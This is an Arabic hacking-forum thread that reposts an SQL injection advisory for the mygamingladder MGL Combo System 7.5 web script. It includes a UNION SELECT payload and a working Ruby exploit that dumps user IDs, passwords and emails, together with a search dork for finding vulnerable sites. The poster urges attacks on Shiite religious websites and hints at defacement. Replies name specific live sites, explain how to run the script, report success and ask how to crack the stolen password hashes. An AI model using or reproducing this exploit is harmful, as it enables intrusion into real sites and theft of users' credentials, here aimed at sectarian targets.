:: vBspiders Professional Network :: - سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره

كود PHP:

   # Title: mygamingladder MGL Combo System <= 7.5 SQL injection

# EDB-ID: 12135

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Easy Laster

# Published: 2010-04-10

# Verified: no

# Download Exploit Code

# Download N/A

 
view source

print?

----------------------------Information------------------------------------------------

+Name : mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability & SQL injection Exploit

+Autor : Easy Laster

+Date   : 10.04.2010

+Script  : mygamingladder MGL Combo System <= 7.5

+Download : ------------------

+Demo : http://www.mygamingladder.com/upgrade/combo/

+Price : 120$

+Language : PHP

+Discovered by Easy Laster

+Security Group 4004-Security-Project 4004-security-project.com

+Greetz to Team-Internet ,Underground Agents

+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,

Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,

N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.

 

---------------------------------------------------------------------------------------

                                                                                      

 ___ ___ ___ ___                         _ _           _____           _         _  

| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_

|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|

  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 

                                              |___|                 |___|           

 

 

----------------------------------------------------------------------------------------

+Vulnerability : http://www.site.com/game/news.php?newsid=

 

 

+Exploitable   : http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1,

concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+

 

 

-----------------------------------------------------------------------------------------

 

#Exploit

 

#!/usr/bin/ruby

#4004-security-project.com

#Discovered and vulnerability by Easy Laster

print "

#########################################################

#            4004-Security-Project                      #

#########################################################

#             mygamingladder MGL Combo System 7.5       #

#                          Exploit                      #

#                     Using Host+Path                   #

#                     www.demo.de /forum/               #

#                         Easy Laster                   #

#########################################################

"

require 'net/http'

print "#########################################################"

print "\nEnter host name (site.com)->"

host=gets.chomp

print "#########################################################"

print "\nEnter script path (/forum/)->"

path=gets.chomp

print "\n#########################################################"

begin

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]

print "\n#########################################################"

rescue

print "\nExploit failed"

end

الدورك

كود:

inurl:news.php?newsid=

لا وصيكم بالتنتيف

مواقع شيعيه حسينيه مركبته كثيير

تحياتي يزيد العتيبي

أخوي طبق لنا على موقع لأني جربت على مواقع كثيرة ما نجحت
ولك جزيل الشكر

لا تحط الاستغلال الموجود حاول انك تكتبه يدوي

طبق على هذا
http://www.noaim.net/news.php?newsid=1909
جريت ما نجح
وشكرا

كتيت ما نجح أخوي
ممكن تكتبه لنا من جديد

مصاب

http://www.noaim.net/news.php?newsid=1909'

جرب خش ورح تشوف :)ذ

http://www.noaim.net/news.php?newsid...ERE/**/id=1--+

ما ظهر شيئ أخوي شوفي لي حل

أخوي عططني موقع أنت طبقت عليه ونجح
خلينا نشوف كيف الحقنة تنكتب
شكرا

مشكور يايزيد

ياقمر احقن انت

http://www.abather.net/news.php?newsid=1041

ايهاب منور الموضوع

اخى الكريم يزيد اولا الف شكر على المجهود

ثانيا ارجو منك ان تشرح لى كيف استطيع استخدام الثغره

استخدام صحيح واعتذر ان كنت سوف ااخذ من وقتك ولكن ارجو المعذره

لتعم الفائده على الجميع

اشكرك مره اخرى

ايهاب

[align=center]^

لازم تسسطب برنامج ترجمة لغة الربي ruby بعدها خش للدوس

\cd

وبعدها

cd ruby

الحين بتخش على مجلد الربي ruby

اجفظ الثغرة بامتداد rb ونسميها vbspiders

نكتب

ruby vbspiders.rb

انتر والسلام عليكم

وتمت الترجمة :$[/align]

اخى الكريم انا فعلا عملت كده والنتيجه كانت

#
################################################## #######
# mygamingladder MGL Combo System 7.5 #
# Exploit #
# Using Host+Path #
# www.demo.de /forum/ #
# Easy Laster #
################################################## #######

صح اريد التطبيق

Using Host+Path
www.demo.de /forum/
#

ماقصر معك الاخ

تحط البيانات هنا

حقت الموقع

Using Host+Path
www.demo.de /forum/
#

نجح 100% بارك الله فيك لكن يوجد مشكل الباس المشفر ممكن موقع معتمد ؟؟